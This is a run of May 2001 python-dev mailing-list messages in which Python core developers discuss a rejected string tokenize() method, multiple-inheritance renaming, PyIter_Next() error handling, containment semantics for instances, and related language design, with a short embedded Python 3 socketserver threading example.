not exactly something you do every day, and > > when you do, it's a one-liner: > > > > def tokenize(string, ignore): > > [word for word in re.findall("\w+", string) if not word in ignore] > > This is not the same as what .tokenize() does: it cut at each > occurrance of a substring rather than words as in your example oh, I didn't see the spaces. splitting on all substrings is even easier (but perhaps a bit more obscure, at least when written on one line): def tokenize(string, seps): return re.split("|".join(map(re.escape, seps)), string) Cheers /F From lkcl at samba-tng.org Fri May 4 13:31:29 2001 From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton) Date: Fri, 4 May 2001 13:31:29 +0200 Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn] Message-ID: <20010504133129.K26116@angua.rince.de> hi there, i thought it best to bring this to someone's attention. the forkingmixin code keeps track of its children, plus because it forks, there's no close_requests() to interfere with the operation of the child etc. etc. now, for some marginally bizarre reason, adding an extra base class - BaseServer - has, i believe (without proof, just a hunch), caused a bug in ThreadingMixIn to be more likely to occur. now, i wrote BaseServer in order to be able to overload this for a server that reads from a SQL server table and performs actions based on what it reads from there (the name of a host and the name of a python script to action on the host, from the database :) :) ... but i don't do threading. python is my first actual exposure to thread programming. does anyone have enough experience with threads to write something in less lines and less time than this message? 
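For readers who want to exercise SocketServer.ThreadingMixIn today, here is a minimal threaded server built on Python 3's socketserver module (3.6 or later is assumed, for the context-manager support). It is a usage sketch only. It does not reproduce the 2.1 double-close bug from the report, and the handler and helper names are hypothetical. Each request is handled in its own worker thread, and the server handles closing the request socket after handle() returns.

```python
import socket
import socketserver
import threading

class UpperEchoHandler(socketserver.BaseRequestHandler):
    def handle(self):
        # Runs in a worker thread; self.request is the connected socket.
        data = self.request.recv(1024)
        self.request.sendall(data.upper())

class ThreadedEchoServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    daemon_threads = True        # worker threads do not block interpreter exit
    allow_reuse_address = True

def echo_once(message: bytes) -> bytes:
    # Port 0 asks the OS for any free port on the loopback interface.
    with ThreadedEchoServer(("127.0.0.1", 0), UpperEchoHandler) as server:
        host, port = server.server_address
        serve_thread = threading.Thread(target=server.serve_forever, daemon=True)
        serve_thread.start()
        try:
            with socket.create_connection((host, port), timeout=5) as client:
                client.sendall(message)
                return client.recv(1024)
        finally:
            # shutdown() must come from a thread other than serve_forever()'s.
            server.shutdown()
```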
all best, luke ----- Forwarded message from noreply at sourceforge.net ----- Delivered-To: lkcl at angua.rince.de Delivered-To: lkcl at samba.org To: noreply at sourceforge.net From: noreply at sourceforge.net Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn Date: Thu, 03 May 2001 16:26:12 -0700 Bugs item #417845, was updated on 2001-04-21 08:28 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470 Category: Python Library Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Guido van Rossum (gvanrossum) Summary: Python 2.1: SocketServer.ThreadingMixIn Initial Comment: SocketServer.ThreadingMixIn does not work properly since it tries to close the socket of a request two times. From gward at python.net Fri May 4 20:12:44 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:12:44 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010504141244.A1167@gerg.ca> On 03 May 2001, Paul F. Dubois said: > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): Maybe I'm being thick, but don't you get the same effect by doing this: class X (Y): _sfoo = Y.foo _sbar = Y.bar ...or would the "rename" syntax also hide the "foo" and "bar" names from X's effective namespace[1]? In that case, I guess some special syntax is needed. [1] "effective namespace" -- the union of X's class dict with all its superclass' dicts; not actually X's namespace, but the set of names you can use in X. I think. Err, whatever. Greg From gward at python.net Fri May 4 20:15:51 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:15:51 -0400 Subject: [Python-Dev] "".tokenize() ? 
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200 References: <3AF27088.DE495210@lemburg.com> Message-ID: <20010504141551.B1167@gerg.ca> On 04 May 2001, M.-A. Lemburg said: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? I concur with /F: -1 because you can do it easily with re.split(). Greg -- Greg Ward - Unix bigot gward at python.net http://starship.python.net/~gward/ I hope something GOOD came in the mail today so I have a REASON to live!! From guido at digicool.com Fri May 4 20:36:14 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:36:14 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT." <20010504141244.A1167@gerg.ca> References: <20010504141244.A1167@gerg.ca> Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com> > On 03 May 2001, Paul F. Dubois said: > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > > use Y's version: > > > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): [Greg Ward] > Maybe I'm being thick, but don't you get the same effect by doing this: > > class X (Y): > _sfoo = Y.foo > _sbar = Y.bar > > ...or would the "rename" syntax also hide the "foo" and "bar" names from > X's effective namespace[1]? In that case, I guess some special syntax > is needed. Paul's point is that the rename thing makes it possible to deprecate the form Y.foo, which is causing the basic ambiguity here. > [1] "effective namespace" -- the union of X's class dict with all its > superclass' dicts; not actually X's namespace, but the set of names you > can use in X. I think. Err, whatever. Probably irrelevant. 
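Greg's aliasing idiom can be checked directly. The following is a minimal sketch in present-day Python 3 syntax with hypothetical classes `Y`, `Z` and `X`: binding `_sfoo = Y.foo` adds a second name but does not hide `foo`, so with `class X(Y, Z)` attribute lookup still stops at `Y.foo` before ever reaching `Z.foo`. Getting the effect Paul describes (`X.foo` resolving to `Z.foo`) needs an explicit extra binding.

```python
class Y:
    def foo(self):
        return "Y.foo"


class Z:
    def foo(self):
        return "Z.foo"


class X(Y, Z):
    # Greg's idiom: keep Y's implementation reachable under a private alias.
    _sfoo = Y.foo


class XPreferZ(Y, Z):
    _sfoo = Y.foo
    # The alias above does not remove the inherited name "foo"; without
    # this line, lookup would still find Y.foo first in the MRO.
    foo = Z.foo


print(X().foo(), X()._sfoo())                # Y.foo Y.foo
print(XPreferZ().foo(), XPreferZ()._sfoo())  # Z.foo Y.foo
print([c.__name__ for c in X.__mro__])       # ['X', 'Y', 'Z', 'object']
```

The extra `foo = Z.foo` line is exactly the kind of bookkeeping a `rename` clause in the class header would make explicit.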
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 4 20:38:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:38:06 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT." <20010504141551.B1167@gerg.ca> References: <3AF27088.DE495210@lemburg.com> <20010504141551.B1167@gerg.ca> Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com> > On 04 May 2001, M.-A. Lemburg said: > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > I concur with /F: -1 because you can do it easily with re.split(). -1 also. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 20:51:26 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 14:51:26 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com> Message-ID: [MAL] > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1 here. Easily enough done via other means, and you just *know* different people will want different variants of tokenization (e.g., nobody in their right mind will want " two " coming back from that example, and, given that it does, that it doesn't also return " three" is baffling). > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? +1 from me: it's the other half of the existing .encode() method, and the current lack of symmetry is icky. From barry at digicool.com Fri May 4 20:57:09 2001 From: barry at digicool.com (Barry A. 
Warsaw) Date: Fri, 4 May 2001 14:57:09 -0400 Subject: [Python-Dev] Multiple inheritance References: <20010503131714.D21814@inetnebr.com> Message-ID: <15090.64389.746625.331215@anthem.wooz.org> >>>>> "JE" == Jeff Epler writes: >> class X (Y rename foo as _sfoo, bar as _sbar ): | Why not let us spell this as: | class X(Y): | from Y import foo as _sfoo, bar as _sbar | ... >>>>> "NS" == Neil Schemenauer writes: NS> This already has a meaning in Python. Paul's suggested syntax NS> is pretty neat, IMHO. Not if Y is a class though, right? That would currently raise an ImportError, so why not hijack it for this purpose? I think it has a natural and clear enough meaning without requiring additional keywords, or complicating the base class specification syntax. -Barry From tim.one at home.com Fri May 4 22:50:03 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 16:50:03 -0400 Subject: [Python-Dev] Change to PyIter_Next()? Message-ID: In spare moments, I've been plugging away at making various functions work nice with iterators (map, min, max, etc). Over and over this requires writing code of the form: op2 = PyIter_Next(it); if (op2 == NULL) { /* StopIteration is *implied* by a NULL return from * PyIter_Next() if PyErr_Occurred() is false. */ if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else goto Fail; } break; } This is wordy, obscure, and in my experience is needed every time I call PyIter_Next(). So I'd like to hide this in PyIter_Next instead, like so: /* Return next item. * If an error occurs, return NULL and set *error=1. * If the iteration terminated normally, return NULL and set *error=0. * Else return the next object and set *error=0. 
*/ PyObject * PyIter_Next(PyObject *iter, int *error) { PyObject *result; if (!PyIter_Check(iter)) { PyErr_Format(PyExc_TypeError, "'%.100s' object is not an iterator", iter->ob_type->tp_name); *error = 1; return NULL; } result = (*iter->ob_type->tp_iternext)(iter); *error = 0; if (result) return result; if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else *error = 1; } /* Else StopIteration is implicit, and there is no error. */ return NULL; } Then *calls* could be the simpler: op2 = PyIter_Next(it, &error); if (op2 == NULL) { if (error) goto Fail; break; } Objections? So far I'm almost the only user of PyIter_Next(); the only other use is in ceval's FOR_ITER, which goes thru a similar dance. However, I'm not clear on why FOR_ITER doesn't clear the exception if PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both true -- that sure smells like a bug (but, if so, the change above would squash it by magic). Note that I'm not proposing to change the signature of the tp_iternext slot similarly. PyIter_Next() is a (IMO appropriately) higher-level function. From guido at digicool.com Sat May 5 00:03:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 17:03:36 -0500 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400." References: Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> > In spare moments, I've been plugging away at making various functions work > nice with iterators (map, min, max, etc). For which efforts I extend my greatest thanks! > Over and over this requires writing code of the form: > [etc.] > > This is wordy, obscure, and in my experience is needed every time I call > PyIter_Next(). > > So I'd like to hide this in PyIter_Next instead, like so: > > /* Return next item. > * If an error occurs, return NULL and set *error=1. > * If the iteration terminated normally, return NULL and set *error=0.
> * Else return the next object and set *error=0. > */ > PyObject * > PyIter_Next(PyObject *iter, int *error) > { [etc.] > } > Then *calls* could be the simpler: > > op2 = PyIter_Next(it, &error); > if (op2 == NULL) { > if (error) > goto Fail; > break; > } I originally had this API for tp_iternext, and changed it to the current API because I got tired of having to declare the error variable. How about making PyIter_Next() call PyErr_Clear() when the exception is StopIteration? Then calls could be op2 = PyIter_Next(it); if (op2 == NULL) { if (PyErr_Occurred()) goto Fail; break; } This is a tad slower and arguably generates more code (assuming an extra call is slower than passing an extra argument and loading it) but doesn't require declaring the error variable. But since you're the customer, it's your choice. > Objections? So far I'm almost the only user of PyIter_Next(); the only other > use is in ceval's FOR_ITER, which goes thru a similar dance. > > However, I'm not clear on why FOR_ITER doesn't clear the exception if > PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both > true -- that sure smells like a bug (but, if so, the change above would > squash it by magic). Smells like a bug indeed. > Note that I'm not proposing to change the signature of the tp_iternext slot > similarly. PyIter_Next() is a (IMO appropriately) higher-level function. Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 23:18:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 17:18:16 -0400 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> Message-ID: [Tim] >> In spare moments, I've been plugging away at ... iterators [Guido] > For which efforts I extend my greatest thanks! Yet but a pale reflection of the thanks I extend to you for implementing these guys to begin with: they're *loads* of fun!
But not nearly as much fun as playing with Perl, so they're still prudently Pythonic . [T proposed adding a int* error arg to PyIter_Next()] [G] > How about making PyIter_Next() call PyErr_Clear() when the exception > is StopIteration? > > Then calls could be > > op2 = PyIter_Next(it); > if (op2 == NULL) { > if (PyErr_Occurred()) > goto Fail; > break; > } Perfect. I'll do that later tonight, and update the PEP to match. > This is a tad slower and arguably generates more code (assuming an > extra call is slower than passing an extra argument and loading it) > but doesn't require declaring the error variable. Well, it's two more calls (since PyErr_Occurred() also makes a call to get the thread state), but I don't really care because the client only does this in case of error or end-of-iteration (which aren't the normal cases). I was dreading finding a spare int var to pass inside FOR_ITER anyway . From paulp at ActiveState.com Sat May 5 02:03:05 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Fri, 04 May 2001 17:03:05 -0700 Subject: [Python-Dev] :: Message-ID: <3AF34339.9C553704@ActiveState.com> I'll throw out a partially formed thought in case it is useful to anybody. "::" might be useful to solve another problem I've been struggling with: how to have multiple package distributions share a namespace (xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). "::" might mean, in general, that you are walking through abstract, potentially merged namespaces and not through concrete dictionary implementations. I think that Python's using the same syntax for package namespaces and attribute accesses might seem more elegant than it is in practice. Things that "seem like" they should work do not because packages are fundamentally different than attributes: >>> from xml import dom.minidom File "", line 1 from xml import dom.minidom ^ SyntaxError: invalid syntax Why isn't this symmetric? I would like to use "." 
on either side of the import >>> import xml >>> print xml.dom Traceback (most recent call last): File "", line 1, in ? AttributeError: 'xml' module has no attribute 'dom' >>> from xml.dom import minidom >>> print xml.dom I find it a little bit weird that importing one module has the side effect of populating a package. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido at digicool.com Sat May 5 05:07:56 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 22:07:56 -0500 Subject: [Python-Dev] :: In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST." <3AF34339.9C553704@ActiveState.com> References: <3AF34339.9C553704@ActiveState.com> Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com> > I find it a little bit weird that importing one module has the side > effect of populating a package. That's just because you've seen too much Java. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sat May 5 10:13:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 05 May 2001 10:13:30 +0200 Subject: [Python-Dev] "".tokenize() ? References: Message-ID: <3AF3B62A.50DD4115@lemburg.com> Tim Peters wrote: > > [MAL] > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1 here. Easily enough done via other means, and you just *know* different > people will want different variants of tokenization (e.g., nobody in their > right mind will want " two " coming back from that example, and, given that > it does, that it doesn't also return " three" is baffling). Ok. I rejected the patch with a mild response to take on this by subclassing strings in Python 2.2 ;-) > > PS: Haven't gotten any response regarding the .decode() method yet... 
> > should I take this as "no objections" ? > > +1 from me: it's the other half of the existing .encode() method, and the > current lack of symmetry is icky. Right. If I hear no strong objections, I'll check in the .decode() method next week. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Sat May 5 13:45:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 06:45:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200." <3AF0662D.48671B4E@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com> > I've attached the patch. Due to a small reorganisation the > patch is a little longer -- symmetry has its price at C level > too ;-) Looks good on paper, so go ahead and check it in. Watch out for potential changes caused by Tim's iter-crusade! :-) While you're at it, why don't you check in the rot13 codec you posted -- it's good to have simple examples in the standard library. It would also be cool to have codecs for common file encodings like base64, quoted-printable, binhex, uuencode, and even hex (binascii.hexlify). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:15:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:15:52 -0500 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200." <3AF3B62A.50DD4115@lemburg.com> References: <3AF3B62A.50DD4115@lemburg.com> Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com> > Ok.
I rejected the patch with a mild response to take on this by > subclassing strings in Python 2.2 ;-) Gustavo didn't take the rejection well. He contacted me asking for a better explanation, and we got into a bit of an argument about how much I must explain my decisions, but I think he understands now. > If I hear no strong objections, I'll check in the .decode() > method next week. Yes, see my previous reply. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:24:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:24:19 -0500 Subject: [Python-Dev] PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST." References: Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> In a checkin message, Tim wrote: > The full story for instance objects is pretty much unexplainable, because > instance_contains() tries its own flavor of iteration-based containment > testing first, and PySequence_Contains doesn't get a chance at it unless > instance_contains() blows up. A consequence is that > some_complex_number in some_instance > dies with a TypeError unless some_instance.__class__ defines __iter__ but > does not define __getitem__. This kind of thing happens everywhere -- instances always define all slots but using the slots sometimes fails when the corresponding __foo__ doesn't exist. Decisions based on the presence or absence of a slot are therefore in general not reliable; the only exception is the decision to *call* the slot or not. The correct solution is not to catch AttributeError and pretend that the slot didn't exist (which would mask an AttributeError occurring inside the __contains__ method if there was one), but to reimplement the default behavior in the instance slot implementation.
In this case, that means that PySequence_Contains() can be simplified (no need to test for AttributeError), and instance_contains() should fall back to a loop over iter(self) rather than trying to use instance_item(). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 22:40:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 16:40:11 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > This kind of thing happens everywhere -- instances always define all > slots but using the slots sometimes fails when the corresponding > __foo__ doesn't exist. Decisions based on the presence or absence of > a slot are therefore in general not reliable; the only exception is > the decision to *call* the slot or not. The correct solution is not > to catch AttributeError and pretend that the slot didn't exist (which > would mask an AttributeError occurring inside the __contains__ method > if there was one), Ya, it sucks. I was inspired by that instance_contains() itself makes dubious assumptions about what an AttributeError means when the functions *it* calls raise it . > but to reimplement the default behavior in the instance slot > implementation. The "backward compatibility" comment in instance_contains() was scary: compatibility with *what*? instance_contains() is pretty darn new. I assumed it meant there was *some* good (but unidentified) reason we had to use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if instance_item() "worked". But I haven't thought of one, except to ensure that some_complex in some_instance_with___getitem__ continues to blow up -- but that's not a good reason. So: > In this case, that means that PySequence_Contains() can be simplified > (no need to test for AttributeError), and instance_contains() should > fall back to a loop over iter(self) rather than trying to use > instance_item(). 
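In current Python 3 the fallback Guido recommends is simply what the `in` operator does: without `__contains__`, membership is tested by iterating (through `__iter__`, or failing that the old `__getitem__` sequence protocol) and comparing each item with rich `==`. A minimal sketch; the class names and the `contains_by_iteration` helper are hypothetical, and the helper only approximates the C-level loop rather than reproducing CPython's code.

```python
class OnlyIter:
    """Defines __iter__ but neither __contains__ nor __getitem__."""

    def __init__(self, items):
        self.items = list(items)

    def __iter__(self):
        return iter(self.items)


class OnlyGetitem:
    """Old-style sequence: only __getitem__, terminated by IndexError."""

    def __init__(self, items):
        self.items = list(items)

    def __getitem__(self, i):
        return self.items[i]  # raises IndexError past the end


def contains_by_iteration(container, x):
    """Rough model of the default 'x in container' loop."""
    for item in container:  # __iter__ if present, else the __getitem__ protocol
        # Identity shortcut first, then rich equality (not a 3-way compare).
        if item is x or item == x:
            return True
    return False


print(3 in OnlyIter([1, 2, 3]))      # True: found via __iter__
print(2j in OnlyGetitem([1, 2, 3]))  # False: no TypeError for a complex
print(contains_by_iteration(OnlyGetitem("abc"), "b"))  # True
```

Because the comparison is `==` rather than an ordering compare, `some_complex in some_instance` no longer blows up, which matches the outcome Tim and Guido were aiming for.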
Will do! From guido at digicool.com Sat May 5 23:48:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 16:48:33 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400." References: Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> > [Guido] > > This kind of thing happens everywhere -- instances always define all > > slots but using the slots sometimes fails when the corresponding > > __foo__ doesn't exist. Decisions based on the presence or absence of > > a slot are therefore in general not reliable; the only exception is > > the decision to *call* the slot or not. The correct solution is not > > to catch AttributeError and pretend that the slot didn't exist (which > > would mask an AttributeError occurring inside the __contains__ method > > if there was one), [Tim] > Ya, it sucks. I was inspired by that instance_contains() itself makes > dubious assumptions about what an AttributeError means when the functions > *it* calls raise it . Actually, instance_contains checks for AttributeError only after calling instance_getattr(), whose only purpose is to return the requested attribute or raise AttributeError, so here it is safe: the __contains__ function hasn't been called yet. > > but to reimplement the default behavior in the instance slot > > implementation. > > The "backward compatibility" comment in instance_contains() was scary: > compatibility with *what*? With previous behavior of 'x in instance'. Before we had __contains__, 'x in y' *always* iterated over the items of y as a sequence, comparing them to x one at a time. The loop does that. > instance_contains() is pretty darn new. I > assumed it meant there was *some* good (but unidentified) reason we had to > use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if > instance_item() "worked". No, that was probably just an oversight -- clearly it should have used rich comparisons. 
(I guess this is a disadvantage of the approach I'm recommending here: if the default behavior changes, the reimplementation of the default behavior in the class must be changed too.) > But I haven't thought of one, except to ensure > that > > some_complex in some_instance_with___getitem__ > > continues to blow up -- but that's not a good reason. Indeed not. > So: > > > In this case, that means that PySequence_Contains() can be simplified > > (no need to test for AttributeError), and instance_contains() should > > fall back to a loop over iter(self) rather than trying to use > > instance_item(). > > Will do! Thanks! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:24:58 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 17:24:58 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Actually, instance_contains checks for AttributeError only after > calling instance_getattr(), whose only purpose is to return the > requested attribute or raise AttributeError, so here it is safe: the > __contains__ function hasn't been called yet. I'd say "safer", but not "safe": at that point we only know that *some* attribute didn't exist, somewhere, while attempting to look up "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ hook, like def __getattr__(self, attr): return global_resolver.resolve(self, attr) where global_resolver has lost its "resolve" attr. "except" clauses aren't more bulletproof in C than in Python <0.9 wink>. > With previous behavior of 'x in instance'. Before we had > __contains__, 'x in y' *always* iterated over the items of y as a > sequence, comparing them to x one at a time. I don't believe I ever knew that! Thanks. I erroneously assumed that the looping behavior was *introduced* when __contains__ was added. > ...
> No, that was probably just an oversight -- clearly it should have used > rich comparisons. (I guess this is a disadvantage of the approach I'm > recommending here: if the default behavior changes, the > reimplementation of the default behavior in the class must be changed > too.) I factored out the new iterator-based __contains__ logic into a new private API function, called when appropriate by both PySequence_Contains() and instance_contains(). So any future changes to what iterator-based __contains__ means will only need to be made in one place. too-easy-ly y'rs - tim From guido at digicool.com Sun May 6 00:31:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 17:31:05 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400." References: Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> > [Guido] > > Actually, instance_contains checks for AttributeError only after > > calling instance_getattr(), whose only purpose is to return the > > requested attribute or raise AttributeError, so here it is safe: the > > __contains__ function hasn't been called yet. [Tim] > I'd say "safer", but not "safe": at that point we only know that *some* > attribute didn't exist, somewhere, while attempting to look up > "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ > hook, like > > def __getattr__(self, attr): > return global_resolver.resolve(self, attr) > > where global_resolver has lost its "resolve" attr. "except" clauses aren't > more bulletproof in C than in Python <0.9 wink>. Yes, but attribute errors inside __getattr__ hooks are *always* a problem to debug, since raising AttributeError is part of its job. So this is not new. I should have said "as safe as it gets." > > With previous behavior of 'x in instance'. Before we had > > __contains__, 'x in y' *always* iterated over the items of y as a > > sequence, comparing them to x one at a time. 
> > I don't believe I ever knew that! Thanks. I erroneously assumed that the > looping behavior was *introduced* when __contains__ was added. Surely you knew that "x in y" looped over the items of y? What else could it have done? It was only defined on sequences! > > ... > > No, that was probably just an oversight -- clearly it should have used > > rich comparisons. (I guess this is a disadvantage of the approach I'm > > recommending here: if the default behavior changes, the > > reimplementation of the default behavior in the class must be changed > > too.) > > I factored out the new iterator-based __contains__ logic into a new private > API function, called when appropriate by both PySequence_Contains() and > instance_contains(). So any future changes to what iterator-based > __contains__ means will only need to be made in one place. Cool. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:53:51 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 17:53:51 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > ... > Surely you knew that "x in y" looped over the items of y? What else > could it have done? It was only defined on sequences! What's a sequence ? I expect I assumed that enduring a Python method call for every element of an *instance* was so expensive that Python didn't bother implementing "in" for instances (just for builtin sequences like lists and strings etc). I *know* I assumed it was so expensive that I never tried it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting "if x in s" where s was a tuple, list or string of length no more than 4; for anything bigger I always used a dict or bisect). So it's a personal blind spot likely due to never looking in that direction. From paul at pfdubois.com Sun May 6 03:10:37 2001 From: paul at pfdubois.com (Paul F.
Dubois) Date: Sat, 5 May 2001 18:10:37 -0700 Subject: [Python-Dev] multiple inheritance -- what I meant Message-ID: When I suggested a modification to the inheritance clause, class X (Y rename a as b, c as d, Z rename foo as bar): someone suggested this was the same as class X (Y, Z): b = Y.a d = Y.c bar = Z.foo I meant two things by my suggestion: 1. I meant that Y.a would never be found when searching for X.a. In particular, if Z.a exists, and a is not explicitly defined in X, X.a is Z.a. 2. More philosophically, rather than being a consequence of the language like the second method is, the proposed syntax is intended to be a clear message to someone reading the class about how the inherited names are being handled. Compare the effort required of a reader to understand these two. (If you think the second one is easier, you probably attended Spam III.) If you can rename in this way there are no problems with multiple inheritance. To be complete you should probably also allow Y undefine x, ... which simply makes Y.x unavailable from X. From Greg.Wilson at baltimore.com Sun May 6 18:26:00 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Sun, 6 May 2001 12:26:00 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Has anyone else found themselves wanting a method that chooses and returns a dictionary element at random, without removing it (as popitem does)? Or is there some way to tell popitem to return a value without mutating the container? If neither, would this be useful, or is it DHG? Thanks Greg From tim.one at home.com Sun May 6 20:15:57 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 6 May 2001 14:15:57 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: [Greg Wilson] > Has anyone else found themselves wanting a method that > chooses and returns a dictionary element at random, Do you mean "random" or "arbitrary"? "random" means every dict entry is equally likely to be chosen; "arbitrary" means nothing is defined about the result (except that it *is* a dict entry). random is much more expensive to implement (under the covers it's a vector, but a vector with holes, so you can't just pick a *slot* at random then "slide over" to the first non-hole (else a given entry's chance of being selected would be proportional to the # of contiguous holes adjacent to it)). > without removing it (as popitem does)? Note that, in the sense above, popitem() returns an arbitrary element. > Or is there some way to tell popitem to return a value without > mutating the container? No. Easy to write an efficient function that does, though: def arb(dict): k, v = pair = dict.popitem() dict[k] = v # restore the entry return pair Given the new dict iterators in 2.2, there's an easier fast way that doesn't mutate the dict even under the covers: def arb(dict): if dict: return dict.iteritems().next() 